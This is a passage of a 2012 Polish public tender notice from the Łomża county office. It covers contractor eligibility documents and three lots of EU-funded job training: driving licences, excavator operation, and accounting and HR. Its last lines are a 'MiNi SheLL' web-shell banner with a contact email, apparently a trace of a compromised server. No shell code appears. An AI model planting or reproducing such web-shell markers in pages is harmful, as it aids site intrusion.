<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dla Części III - aktualny (potwierdzony przez pracownika właściwego Wojewódzkiego Urzędu Pracy (pieczęcią imienną i firmową) nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert) wpis do rejestru instytucji szkoleniowych prowadzonych przez WUP (Rozporządzenie Ministra Gospodarki i Pracy z dnia 27.10.2004r. w sprawie rejestru instytucji szkoleniowych; Ustawa o promocji zatrudnienia i instytucjach rynku pracy (art. 20 ust. 1) z dnia 20.04.2004r., Dz. U. z 2004r., poz. 1001 ze zm.)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatlomza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Łomży
18-400 Łomża ul. Szosa Zambrowska 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2012 godzina 12:00, miejsce: Starostwo Powiatowe w Łomży
18-400 Łomża ul. Szosa Zambrowska 1 p. 304.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projektu pn. Specjalizacja - motorem sukcesu zawodowego o nr WND-POKL.08.01.01.-20-06611.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenie prawo jazdy kat. C, C+E oraz szkolenie w ramach kwalifikacji wstępnej przyśpieszonej w zakresie bloku programowego kat. C, C+E, C1, C1 +E..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeszkolenie 15 osób - prawo jazdy kategorii C lub C + E..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie wykonawcy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenie-operator koparko-ładowarki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie dla 15 osób. Sprawne i właściwe działanie urządzeń i zespołów maszyny.   
Urabianie calizny z dostosowanie grubości skrawanej warstwy do rodzaju skały. Przekazanie urobku na środki transportu (składy wagonów, przenośniki taśmowe).Koordynacja i współpraca z obsługą środków transportu odbierających urobek. Dokonywanie zmiany położenia koparki lub zwałowarki w miarę postępu eksploatacja skarpy. Montowanie, demontowanie, przeglądanie, naprawianie i remonty bieżące maszyn. Przepisy bhp i ppoż.,w tym stosowanie odzieży ochronnej i sprzętu ochrony osób oraz zabezpieczenie  przeciwurazowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie wykonawcy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkolenie - księgowy i szkolenie specjalista do spraw kadr..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie 1- Księgowy dla 30 osób 2grupy x 15 os. -150 godz. grupa. 
Termin realizacji zamówienia wrzesień - grudzień 2012r. - 1 grupa i styczeń-kwiecień 2013r. -2 grupa. 
Zakres merytoryczny min.:
Prowadzenie obsługi finansowo-księgowej, planowanie budżetu, bieżąca ewidencja i rejestracja operacji gospodarczych, obliczanie i rozliczanie kosztów produkcji, podatki i składki, kontrola dokumentów finansowych, sporządzanie zestawień obrotów i sald syntetycznych, sprawozdań finansowych oraz bilansów zysków i strat. Uzupełnione o zagadnienia związane z obsługa komputerowego programu księgowego.
Szkolenie powinno obejmować: rachunkowość komputerowa, pakiet MS OFFICE, program SYMFONIA.  
Szkolenia w pracowni komputerowej z wykorzystaniem pracy uczestnika przy komputerze min. 75 godz. szkolenia.
Szkolenie zakończone egzaminem wewnętrznym sprawdzającym umiejętności zdobyte przez uczestników.
Ramowy program szkolenia - musi zostać załączony do oferty.

Szkolenie 2 - Specjalista do spraw kadr dla 30 osób 2grupy x 15 os. -150 godz. grupa. 
Termin realizacji zamówienia listopad 2012r. - luty 2013r. - 1 grupa i marzec-czerwiec 2013r. - 2 grupa. 
Zakres merytoryczny min.:
Opracowywanie, weryfikacja i przechowywanie dokumentów związanych ze sprawami pracowników, gromadzenie danych dotyczących pracowników ,opracowywanie i przeglądanie dokumentów kandydatów do pracy np. ocena kwalifikacji i uprawnień kandydatów, sprawdzanie wiarygodności kandydatów, zbieranie danych z potencjalnych źródeł informacji przygotowanie rekomendacji dotyczącej obsadzania stanowisk , raporty na tematy związane z działalności w zakresie zarządzania zasobami ludzkimi, obsługa kadrowego programu komputerowego - pakiet MS OFFICE, System SYMFONIA - kadry i płace, ubezpieczenia i program PŁATNIK
Szkolenia w pracowni komputerowej z wykorzystaniem pracy uczestnika przy komputerze min. 75 godz. szkolenia.
Szkolenie zakończone egzaminem wewnętrznym sprawdzającym umiejętności zdobyte przez uczestników .
Ramowy program szkolenia - musi zostać załączony do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie wykonawcy - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com